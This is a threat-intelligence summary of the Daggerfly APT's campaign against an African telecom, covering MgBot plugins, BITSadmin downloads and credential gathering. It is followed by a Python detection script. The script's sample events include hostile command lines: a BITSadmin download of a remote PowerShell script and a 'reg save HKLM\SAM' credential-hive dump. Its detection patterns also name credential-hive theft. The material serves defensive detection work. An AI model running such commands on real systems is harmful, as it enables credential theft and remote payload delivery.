Daggerfly APT Sets Its Sights on African Telecoms Corporation
Category: Threat Actor Activity | Industry: Telecommunications | Level: Tactical | Source: Symantec
The Daggerfly advanced persistent threat group (aka Evasive Panda or Bronze Highland) was observed targeting a telecommunications organization in Africa as part of its latest campaign. Researchers from Symantec's Threat Hunter Team discovered that Daggerfly operators deployed "unseen plugins from the MgBot malware framework." Attribution of this campaign to Daggerfly was based on tactics, techniques, and procedures (TTPs) shared with a prior Daggerfly intrusion: reuse of the same folders, file names, an MgBot sample, and a loader DLL, as well as the deployment of 'dbengin.exe', a renamed copy of Rundll32.exe. Symantec first identified signs of the infection at the telecom company in November 2022 through a suspicious AnyDesk connection to a Microsoft Exchange mail server.
The Exchange server was also infected with the WannaMine crypto-miner; however, it is undetermined whether this activity was part of Daggerfly's campaign. It is only evidence that the compromised Microsoft Exchange server was "unpatched and vulnerable to the EternalBlue exploit." Daggerfly operators made use of BitsAdmin and PowerShell to download tools and scripts. One of the downloaded scripts, "GetCredManCreds", was used to gather credentials and accounts from web services. Credentials were also gathered from the Windows registry hives. The threat actors then created a local account for persistence. Daggerfly's objective is assessed to be "intelligence gathering campaigns" against intelligence-rich organizations such as telecommunications companies, "due to the access they can potentially provide to the communications of end-users."
- BITSadmin Abuse for Host Compromise
Anvilogic Use Cases:
- BITSadmin Execution
- AnyDesk Command Line Execution
- Credentials in Registry
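As an added illustration (not from Symantec's report or Anvilogic's detection content), the following Python turns the TTPs above into checks over constructed process-creation events: a renamed Rundll32 such as 'dbengin.exe' (on-disk name differing from the PE's OriginalFileName), BITSadmin pulling a remote file, reg.exe saving credential-bearing hives (an assumed pattern for "Credentials in Registry"), and AnyDesk execution. All paths, URLs and command lines are constructed samples.

```python
import ntpath

# Constructed Sysmon-style process-creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\ProgramData\dbengin.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"dbengin.exe C:\ProgramData\plugin.dll,Run"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe", "OriginalFileName": "bitsadmin.exe",
     "CommandLine": r"bitsadmin /transfer job /download http://example.invalid/a.ps1 C:\Users\Public\a.ps1"},
    {"Image": r"C:\Windows\System32\reg.exe", "OriginalFileName": "reg.exe",
     "CommandLine": r"reg save HKLM\SAM C:\Users\Public\sam.hiv"},
    {"Image": r"C:\Users\Public\AnyDesk.exe", "OriginalFileName": "AnyDesk.exe",
     "CommandLine": r"C:\Users\Public\AnyDesk.exe"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},  # benign: name matches metadata
]

# Registry hives that hold local credential material (assumed detection scope).
HIVES = ("hklm\\sam", "hklm\\security", "hklm\\system")


def classify(event):
    """Return the list of detection names that fire for one process-creation event."""
    image = ntpath.basename(event["Image"]).lower()
    orig = event.get("OriginalFileName", "").lower()
    cmd = event["CommandLine"].lower()
    hits = []
    # Renamed rundll32: PE metadata still says rundll32 but the on-disk name differs.
    if orig == "rundll32.exe" and image != "rundll32.exe":
        hits.append("renamed_rundll32")
    # BITSadmin fetching a remote file (the tool/script download step in the report).
    if image == "bitsadmin.exe" and "/transfer" in cmd and "http" in cmd:
        hits.append("bitsadmin_download")
    # reg.exe saving or exporting a credential-bearing hive.
    if image == "reg.exe" and any(op in cmd for op in (" save ", " export ")) \
            and any(h in cmd for h in HIVES):
        hits.append("registry_hive_dump")
    # AnyDesk running on a host where remote-access tooling is unexpected (e.g. an Exchange server).
    if image == "anydesk.exe":
        hits.append("anydesk_execution")
    return hits


def run_detections(events):
    """Map each event's Image to the detections it triggered; quiet events are omitted."""
    return {e["Image"]: hits for e in events if (hits := classify(e))}


if __name__ == "__main__":
    for image, hits in run_detections(SAMPLE_EVENTS).items():
        print(f"{image}: {', '.join(hits)}")
```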